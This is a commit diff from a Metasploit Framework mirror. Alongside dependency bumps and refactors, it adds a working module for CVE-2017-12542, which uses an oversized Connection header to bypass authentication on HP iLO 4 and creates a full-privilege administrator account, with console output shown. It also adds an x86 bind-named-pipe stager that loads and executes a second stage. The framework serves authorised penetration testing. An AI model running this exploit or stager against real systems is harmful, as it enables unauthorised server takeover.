infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'rapid7/master' into goliath

GSoC/Meterpreter_Web_Console
James Barnett 2018-03-23 11:26:31 -05:00
parent eb47962050 b9fc786d24
commit 6b3a4a56dc
20 changed files with 814 additions and 162 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Gemfile.lock
View File

@ -110,7 +110,7 @@ GEM
backports (3.11.1)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.2)
bindata (2.4.3)
bit-struct (0.16)
builder (3.2.3)
coderay (1.1.2)
@ -119,7 +119,7 @@ GEM
daemons (1.2.4)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
docile (1.3.0)
erubis (2.7.0)
eventmachine (1.2.3)
factory_girl (4.9.0)
@ -159,7 +159,7 @@ GEM
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.2.0)
loofah (2.2.2)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
@ -252,7 +252,7 @@ GEM
activesupport (= 4.2.10)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.3.0)
rake (12.3.1)
rb-readline (0.5.5)
recog (2.1.18)
nokogiri
@ -293,7 +293,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.10)
rex-socket (0.1.12)
rex-core
rex-sslscan (0.1.5)
rex-core
@ -343,8 +343,8 @@ GEM
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.15.1)
docile (~> 1.1.0)
simplecov (0.16.1)
docile (~> 1.1)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.2)

BIN
db/modules_metadata_base.pstore
View File

Binary file not shown.

42
documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md Normal file
View File

@ -0,0 +1,42 @@
This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, which is 100% stable when exploited this way, to create an arbitrary administrator account.
## Verification Steps
1. Start `msfconsole`
2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
3. Set `RHOST`
4. run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
5. Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
6. run `run` to actually create the account on the iLO
## Options
**USERNAME**
The username of the new administrator account. Defaults to a random string.
**PASSWORD**
The password of the new administrator account. Defaults to a random string.
## Scenarios
### New administrator account creation
```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
RHOST => 192.168.42.78
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
[+] 192.168.42.78:443 The target is vulnerable.
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
USERNAME => test_user
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
PASSWORD => test_password
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
[*] Trying to create account test_user...
[+] Account test_user/test_password created successfully.
[*] Auxiliary module execution completed
msf auxiliary(admin/hp/hp_ilo_create_admin_account) >
```

27
lib/metasploit/framework/login_scanner/ssh.rb
View File

@ -146,6 +146,33 @@ module Metasploit
self.verbosity = :fatal if self.verbosity.nil?
end
public
def get_platform(proof)
case proof
when /Linux/
'linux'
when /Darwin/
'osx'
when /SunOS/
'solaris'
when /BSD/
'bsd'
when /HP-UX/
'hpux'
when /AIX/
'aix'
when /Win32|Windows/
'windows'
when /Unknown command or computer name/
'cisco-ios'
when /unknown keyword/ # ScreenOS
'juniper'
when /JUNOS Base OS/ #JunOS
'juniper'
end
end
end
end

51
lib/msf/core/handler/bind_named_pipe.rb
View File

@ -9,6 +9,7 @@ require 'rex/proto/smb/simpleclient'
# 1) A peek named pipe operation is carried out before every read to prevent blocking. This
# generates extra traffic. SMB echo requests are also generated to force the packet
# dispatcher to perform a read.
# 2) SMB1 only. Switch to ruby_smb.
#
#
@ -23,21 +24,23 @@ require 'rex/proto/smb/simpleclient'
# A peek operation on the pipe fixes this.
#
class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :server_max_buffer_size
attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :simple, :server_max_buffer_size
STATUS_BUFFER_OVERFLOW = 0x80000005
STATUS_PIPE_BROKEN = 0xc000014b
def initialize(*args, server_max_buffer_size:)
def initialize(*args, simple:, server_max_buffer_size:)
super(*args)
self.client = args[0]
self.simple = simple
self.client = simple.client
self.mutex = Mutex.new # synchronize read/writes
self.last_comm = Time.now # last successfull read/write
self.write_queue = Queue.new # queue message to send
self.write_queue = Queue.new # messages to send
self.write_thread = Thread.new { dispatcher }
self.echo_thread = Thread.new { force_read }
self.read_buff = ''
self.server_max_buffer_size = server_max_buffer_size
self.chunk_size = server_max_buffer_size - 260
self.server_max_buffer_size = server_max_buffer_size # max transaction size
self.chunk_size = server_max_buffer_size - 260 # max read/write size
end
# Check if there are any bytes to read and return number available. Access must be synchronized.
@ -46,6 +49,9 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
setup = [0x23, self.file_id].pack('vv')
# Must ignore errors since we expect STATUS_BUFFER_OVERFLOW
pkt = self.client.trans_maxzero('\\PIPE\\', '', '', 2, setup, false, true, true)
if pkt['Payload']['SMB'].v['ErrorClass'] == STATUS_PIPE_BROKEN
raise IOError
end
avail = 0
begin
avail = pkt.to_s[pkt['Payload'].v['ParamOffset']+4, 2].unpack('v')[0]
@ -80,7 +86,7 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
# Runs as a thread and synchronizes writes. Allows write operations to return
# immediately instead of waiting for the mutex.
def dispatcher
while true
while not self.write_queue.closed?
data = self.write_queue.pop
self.mutex.synchronize do
sent = 0
@ -98,24 +104,24 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
# Intercepts the socket.close from the session manager when the session dies.
# Cleanly terminates the SMB session and closes the socket.
def close
self.echo_thread.kill rescue nil
# Give the meterpreter shutdown command a chance
self.write_queue.close
if self.write_queue.size > 0
sleep(1.0)
end
self.write_thread.kill
begin
# close pipe
super
rescue => e
if self.write_thread.join(2.0)
self.write_thread.kill
end
rescue
end
# close pipe, share, and socket
super rescue nil
self.simple.disconnect(self.simple.last_share) rescue nil
self.client.socket.close
end
def read(count)
data = ''
begin
if count > self.read_buff.length
# need more data to satisfy request
self.mutex.synchronize do
@ -131,8 +137,6 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
end
end
end
rescue
end
data = self.read_buff[0, [count, self.read_buff.length].min]
self.read_buff = self.read_buff[data.length..-1]
@ -190,7 +194,8 @@ class SimpleClientPipe < Rex::Proto::SMB::SimpleClient
def create_pipe(path)
pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST)
file_id = pkt['Payload'].v['FileID']
self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, server_max_buffer_size: self.server_max_buffer_size)
self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, simple: self,
server_max_buffer_size: self.server_max_buffer_size)
end
end
@ -202,7 +207,7 @@ module Msf
#
# Returns the string representation of the handler type, in this case
# 'reverse_named_pipe'.
# 'bind_named_pipe'.
#
def self.handler_type
"bind_named_pipe"
@ -210,15 +215,15 @@ module Msf
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
# 'bind'.
#
def self.general_handler_type
"bind"
end
#
# Initializes the reverse handler and ads the options that are required
# for reverse named pipe payloads.
# Initializes the handler and ads the options that are required for
# bind named pipe payloads.
#
def initialize(info={})
super

35
lib/msf/core/modules/external/python/metasploit/module.py vendored
View File

@ -1,8 +1,43 @@
import json
import logging
import os
import sys
class LogFormatter(logging.Formatter):
def __init__(self, prefix, *args, **kwargs):
super(LogFormatter, self).__init__(*args, **kwargs)
self.prefix = prefix
def format(self, record):
return self.prefix + record.msg
class LogHandler(logging.Handler):
def emit(self, record):
level = 'debug'
if record.levelno >= logging.ERROR:
level = 'error'
elif record.levelno >= logging.WARNING:
level = 'warning'
elif record.levelno >= logging.INFO:
level = 'info'
log(self.format(record), level)
return
@classmethod
def setup(cls, level=logging.DEBUG, name=None, msg_prefix=None):
logger = logging.getLogger(name)
handler = cls()
if level is not None:
logger.setLevel(level)
if msg_prefix is not None:
handler.setFormatter(LogFormatter(msg_prefix))
logger.addHandler(handler)
return handler
def log(message, level='info'):
rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': {
'level': level,

4
lib/msf/core/modules/external/shim.rb vendored
View File

@ -13,9 +13,9 @@ class Msf::Modules::External::Shim
capture_server(mod)
when 'dos'
dos(mod)
when 'scanner.single'
when 'single_scanner'
single_scanner(mod)
when 'scanner.multi'
when 'multi_scanner'
multi_scanner(mod)
else
# TODO have a nice load error show up in the logs

3
lib/msf/core/modules/external/templates/multi_scanner.erb vendored
View File

@ -16,12 +16,13 @@ class MetasploitModule < Msf::Auxiliary
})
register_options([
OptInt.new('batch_size', [false, 'Number of hosts to run in each batch', 200]),
<%= meta[:options] %>
])
end
def run_batch_size
200
datastore['batch_size']
end
def run_batch(ips)

15
lib/msf/core/modules/metadata/cache.rb
View File

@ -24,17 +24,21 @@ class Cache
# Refreshes cached module metadata as well as updating the store
#
def refresh_metadata_instance(module_instance)
@mutex.synchronize {
dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
refresh_metadata_instance_internal(module_instance)
update_store
}
end
#
# Returns the module data cache, but first ensures all the metadata is loaded
#
def get_metadata
@mutex.synchronize {
wait_for_load
@module_metadata_cache.values
}
end
#
@ -42,6 +46,7 @@ class Cache
# if there are changes.
#
def refresh_metadata(module_sets)
@mutex.synchronize {
unchanged_module_references = get_unchanged_module_references
has_changes = false
module_sets.each do |mt|
@ -75,8 +80,13 @@ class Cache
end
update_store if has_changes
}
end
#######
private
#######
#
# Returns a hash(type->set) which references modules that have not changed.
#
@ -102,10 +112,6 @@ class Cache
return skip_reference_name_set_by_module_type
end
#######
private
#######
def remove_from_cache(module_name)
old_cache_size = @module_metadata_cache.size
@module_metadata_cache.delete_if {|_, module_metadata|
@ -140,6 +146,7 @@ class Cache
end
def initialize
@mutex = Mutex.new
@module_metadata_cache = {}
@store_loaded = false
@console = Rex::Ui::Text::Output::Stdio.new

8
lib/msf/core/modules/metadata/store.rb
View File

@ -19,6 +19,10 @@ module Msf::Modules::Metadata::Store
load_metadata
end
#######
private
#######
#
# Update the module meta cache disk store
#
@ -32,10 +36,6 @@ module Msf::Modules::Metadata::Store
end
end
#######
private
#######
def load_metadata
begin
retries ||= 0

349
lib/msf/core/payload/windows/bind_named_pipe.rb Normal file
View File

@ -0,0 +1,349 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/send_uuid'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
module Msf
###
#
# bind_named_pipe payload generation for Windows ARCH_X86
#
###
module Payload::Windows::BindNamedPipe
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::SendUUID
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
#
# Register bind_named_pipe specific options
#
def initialize(*args)
super
register_advanced_options(
[
OptInt.new('WAIT_TIMEOUT', [false, 'Seconds pipe will wait for a connection', 10])
]
)
end
#
# Generate the first stage
#
def generate
conf = {
name: datastore['PIPENAME'],
host: datastore['PIPEHOST'],
timeout: datastore['WAIT_TIMEOUT'],
reliable: false,
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:reliable] = true
conf[:exitfunk] = datastore['EXITFUNC']
end
generate_bind_named_pipe(conf)
end
#
# By default, we don't want to send the UUID, but we'll send
# for certain payloads if requested.
#
def include_send_uuid
false
end
#
# Generate and compile the stager
#
def generate_bind_named_pipe(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp ; block API pointer
#{asm_bind_named_pipe(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
def transport_config(opts={})
transport_config_bind_named_pipe(opts)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# Reliability adds bytes! +56 if exitfunk, otherwise +90
#space += 56
space += 90
space += uuid_required_size if include_send_uuid
# The final estimated size
space
end
def uuid_required_size
# TODO update this
space = 0
# UUID size
space += 16
end
#
# hPipe must be in edi. eax will contain WriteFile return value
#
def asm_send_uuid(uuid=nil)
uuid ||= generate_payload_uuid
uuid_raw = uuid.to_raw
asm << %Q^
send_uuid:
push 0 ; lpNumberOfBytesWritten
push esp
push #{uuid_raw.length} ; nNumberOfBytesToWrite
call get_uuid_address ; put uuid buffer on the stack
db #{raw_to_db(uuid_raw)} ; lpBuffer
get_uuid_address:
push edi : hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
^
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
# @option opts [Bool] :reliable Whether or not to enable error handling code
# @option opts [String] :name Pipe name to create
# @option opts [Int] :timeout Seconds to wait for pipe connection
#
def asm_bind_named_pipe(opts={})
reliable = opts[:reliable]
timeout = opts[:timeout] * 1000 # convert to millisecs
retry_wait = 500
retry_count = timeout / retry_wait
full_pipe_name = "\\\\\\\\.\\\\pipe\\\\#{opts[:name]}" # double escape -> \\.\pipe\name
chunk_size = 0x10000 # pipe buffer size
cleanup_funk = reliable ? 'cleanup_file' : 'failure'
pipe_mode = 1 # (PIPE_TYPE_BYTE|PIPE_NOWAIT|PIPE_READMODE_BYTE)
asm = %Q^
create_named_pipe:
push 0 ; lpSecurityAttributes. Default r/w for creator and administrators
push 0 ; nDefaultTimeOut
push #{chunk_size} ; nInBufferSize
push #{chunk_size} ; nOutBufferSize
push 255 ; nMaxInstances (PIPE_UNLIMITED_INSTANCES). in case pipe isn't released
push #{pipe_mode} ; dwPipeMode
push 3 ; dwOpenMode (PIPE_ACCESS_DUPLEX)
call get_pipe_name ; lpName
db "#{full_pipe_name}", 0x00
get_pipe_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
mov edi, eax ; save hPipe (using sockedi convention)
; check for failure
cmp eax, -1 ; did it work? (INVALID_HANDLE_VALUE)
jz failure
; initialize retry counter
push #{retry_count} ; retry counter
pop esi
; Connect pipe to remote
connect_pipe:
push 0 ; lpOverlapped
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
call ebp ; ConnectNamedPipe(hPipe, lpOverlapped)
; check for failure
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
call ebp ; GetLastError()
cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED
jz get_stage_size ; success
dec esi
jz #{cleanup_funk} ; out of retries
; wait before trying again
push #{retry_wait}
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
call ebp ; Sleep(millisecs)
jmp connect_pipe
^
asm << asm_send_uuid if include_send_uuid
asm << 'get_stage_size:'
# For reliability, set pipe state to wait so ReadFile blocks
if reliable
asm << %Q^
push 0
mov ecx, esp
push 0 ; lpCollectDataTimeout
push 0 ; lpMaxCollectionCount
push ecx ; lpMode (PIPE_WAIT)
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
^
end
asm << %Q^
; read size of second stage
sub esp, 8
push 0 ; lpOverlapped
lea ebx, [esp+4] ; lpNumberOfBytesRead
push ebx
push 4 ; nNumberOfBytesToRead
lea ecx, [esp+16] ; lpBuffer
push ecx
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop eax ; lpNumberOfBytesRead
pop esi ; lpBuffer (stage size)
^
if reliable
asm << %Q^
; check for bytesRead == 4
cmp eax, 4 ; expecting 4 bytes
jnz cleanup_file
^
end
asm << %Q^
get_second_stage:
; Alloc a RWX buffer for the second stage
push 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push esi ; dwLength
push 0 ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
^
if reliable
asm << %Q^
test eax, eax ; VirtualAlloc returning 0 is an error
jz cleanup_file
^
end
asm << %Q^
push eax ; save stage base address
mov ebx, eax ; stage 2 buff ptr
read_more:
; prepare the size min(0x10000, esi)
mov edx, #{chunk_size}
cmp edx, esi
jle read_max ; read chunk_size
mov edx, esi ; read remaining bytes
read_max:
push 0
mov ecx, esp
push 0 ; lpOverlapped
push ecx ; lpNumberOfBytesRead
push edx ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop edx ; lpNumberOfBytesRead
^
if reliable
asm << %Q^
; check to see if the read worked
test eax, eax
jnz read_successful
; something failed so free up memory
pop ecx
push 0x4000 ; MEM_DECOMMIT
push 0 ; dwSize, 0 to decommit whole block
push ecx ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
cleanup_file:
; cleanup the pipe handle
push edi ; file handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
call ebp ; CloseHandle(hPipe)
jmp failure
^
end
asm << %Q^
read_successful:
add ebx, edx ; buffer += bytes_received
sub esi, edx ; length -= bytes_received
test esi, esi ; check for 0 bytes left
jnz read_more ; continue if we have more to read
pop ecx
jmp ecx ; jump into the second stage
^
asm << 'failure:'
if opts[:exitfunk]
asm << %Q^
call exitfunk
^
asm << asm_exitfunk(opts)
elsif reliable
asm << %Q^
call get_kernel32_name
db "kernel32", 0x00
get_kernel32_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
call ebp ; GetModuleHandleA("kernel32")
call get_exit_name
db "ExitThread", 0x00
get_exit_name: ; lpProcName
push eax ; hModule
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
call ebp ; GetProcAddress(hModule, "ExitThread")
push 0 ; dwExitCode
call eax ; ExitProcess(0)
^
else
# run off the end
end
asm
end
end
end

2
lib/msf/core/payload/windows/x64/bind_named_pipe.rb
View File

@ -128,7 +128,7 @@ module Payload::Windows::BindNamedPipe_x64
sub rsp, 16 ; allocate + alignment
mov r9, rsp ; lpNumberOfBytesWritten
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
call rbp
call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
add rsp, 16
^
end

111
modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb Normal file
View File

@ -0,0 +1,111 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
'Description' => %q{
This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
overflow in the Connection HTTP header handling by the web server.
Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
accounts creation.
},
'References' =>
[
[ 'CVE', '2017-12542' ],
[ 'BID', '100467' ],
[ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
[ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
],
'Author' =>
[
'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Aug 24 2017",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
])
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/rest/v1/AccountService/Accounts',
'headers' => {
"Connection" => Rex::Text.rand_text_alphanumeric(29)
}
})
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? '"Description":"iLO User Accounts"'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
print_status("Trying to create account #{datastore["USERNAME"]}...")
data = {}
data["UserName"] = datastore["USERNAME"]
data["Password"] = datastore["PASSWORD"]
data["Oem"] = {}
data["Oem"]["Hp"] = {}
data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
data["Oem"]["Hp"]["Privileges"] = {}
data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/rest/v1/AccountService/Accounts',
'ctype' => 'application/json',
'headers' => {
"Connection" => Rex::Text.rand_text_alphanumeric(29)
},
'data' => data.to_json()
})
rescue Rex::ConnectionRefused
end
unless res
fail_with(Failure::Unknown, 'Connection failed')
end
if res.body.include? 'InvalidPasswordLength'
fail_with(Failure::BadConfig, "Password #{datastore["PASSWORD"]} is too short.")
end
if res.body.include? 'UserAlreadyExist'
fail_with(Failure::BadConfig, "Unable to add login #{datastore["USERNAME"]}, user already exists")
end
unless res.code == 201
fail_with(Failure::UnexpectedReply, "Unknown error while creating the user. Response: #{res.code}")
end
print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
end
end

33
modules/auxiliary/scanner/ssh/ssh_login.rb
View File

@ -53,11 +53,11 @@ class MetasploitModule < Msf::Auxiliary
datastore['RPORT']
end
def session_setup(result, ssh_socket)
return unless ssh_socket
def session_setup(result, scanner)
return unless scanner.ssh_socket
# Create a new session
conn = Net::SSH::CommandStream.new(ssh_socket)
conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
merge_me = {
'USERPASS_FILE' => nil,
@ -68,31 +68,10 @@ class MetasploitModule < Msf::Auxiliary
}
info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
s = start_session(self, info, merge_me, false, conn.lsock)
self.sockets.delete(ssh_socket.transport.socket)
self.sockets.delete(scanner.ssh_socket.transport.socket)
# Set the session platform
case result.proof
when /Linux/
s.platform = "linux"
when /Darwin/
s.platform = "osx"
when /SunOS/
s.platform = "solaris"
when /BSD/
s.platform = "bsd"
when /HP-UX/
s.platform = "hpux"
when /AIX/
s.platform = "aix"
when /Win32|Windows/
s.platform = "windows"
when /Unknown command or computer name/
s.platform = "cisco-ios"
when /unknown keyword/ # ScreenOS
s.platform = "juniper"
when /JUNOS Base OS/ #JunOS
s.platform = "juniper"
end
s.platform = scanner.get_platform(result.proof)
s
end
@ -140,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
session_setup(result, scanner.ssh_socket)
session_setup(result, scanner)
:next_user
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"

33
modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
View File

@ -68,11 +68,11 @@ class MetasploitModule < Msf::Auxiliary
datastore['RHOST']
end
def session_setup(result, ssh_socket, fingerprint)
return unless ssh_socket
def session_setup(result, scanner, fingerprint)
return unless scanner.ssh_socket
# Create a new session from the socket
conn = Net::SSH::CommandStream.new(ssh_socket)
conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
# Clean up the stored data - need to stash the keyfile into
# a datastore for later reuse.
@ -87,31 +87,10 @@ class MetasploitModule < Msf::Auxiliary
info = "SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})"
s = start_session(self, info, merge_me, false, conn.lsock)
self.sockets.delete(ssh_socket.transport.socket)
self.sockets.delete(scanner.ssh_socket.transport.socket)
# Set the session platform
case result.proof
when /Linux/
s.platform = "linux"
when /Darwin/
s.platform = "osx"
when /SunOS/
s.platform = "solaris"
when /BSD/
s.platform = "bsd"
when /HP-UX/
s.platform = "hpux"
when /AIX/
s.platform = "aix"
when /Win32|Windows/
s.platform = "windows"
when /Unknown command or computer name/
s.platform = "cisco-ios"
when /unknown keyword/ # ScreenOS
s.platform = "juniper"
when /JUNOS Base OS/ #JunOS
s.platform = "juniper"
end
s.platform = scanner.get_platform(result.proof)
s
end
@ -164,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(credential_data)
tmp_key = result.credential.private
ssh_key = SSHKey.new tmp_key
session_setup(result, scanner.ssh_socket, ssh_key.fingerprint)
session_setup(result, scanner, ssh_key.fingerprint)
:next_user
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']

2
modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py
View File

@ -60,7 +60,7 @@ metadata = {
{'type': 'aka', 'ref': 'ROBOT'},
{'type': 'aka', 'ref': 'Adaptive chosen-ciphertext attack'}
],
'type': 'scanner.single',
'type': 'single_scanner',
'options': {
'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 443},

2
modules/auxiliary/scanner/wproxy/att_open_proxy.py
View File

@ -23,7 +23,7 @@ metadata = {
{'type': 'aka', 'ref': 'SharknAT&To'},
{'type': 'aka', 'ref': 'sharknatto'}
],
'type': 'scanner.multi',
'type': 'multi_scanner',
'options': {
'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None},
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152},

29
modules/payloads/stagers/windows/bind_named_pipe.rb Normal file
View File

@ -0,0 +1,29 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/bind_named_pipe'
require 'msf/core/payload/windows/bind_named_pipe'
module MetasploitModule
CachedSize = 336
include Msf::Payload::Stager
include Msf::Payload::Windows::BindNamedPipe
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows x86 Bind Named Pipe Stager',
'Description' => 'Listen for a pipe connection (Windows x86)',
'Author' => [ 'UserExistsError' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindNamedPipe,
'Convention' => 'sockedi', # hPipe
'Stager' => { 'RequiresMidstager' => false }
))
end
end

53
msfvenom
View File

@ -1,28 +1,31 @@
#!/usr/bin/env ruby
# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex'
require 'msf/ui'
require 'msf/base'
require 'msf/core/payload_generator'
class MsfVenomError < StandardError; end
class HelpError < StandardError; end
class UsageError < MsfVenomError; end
class NoTemplateError < MsfVenomError; end
class IncompatibleError < MsfVenomError; end
require 'optparse'
require 'timeout'
def require_deps
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex'
require 'msf/ui'
require 'msf/base'
require 'msf/core/payload_generator'
@framework_loaded = true
end
# Creates a new framework object.
#
@ -30,9 +33,16 @@ require 'optparse'
# @param (see ::Msf::Simple::Framework.create)
# @return [Msf::Framework]
def init_framework(create_opts={})
require_deps unless @framework_loaded
create_opts[:module_types] ||= [
::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
]
create_opts[:module_types].map! do |type|
type = Msf.const_get("MODULE_#{type.upcase}")
end
@framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
end
@ -178,6 +188,7 @@ def parse_args(args)
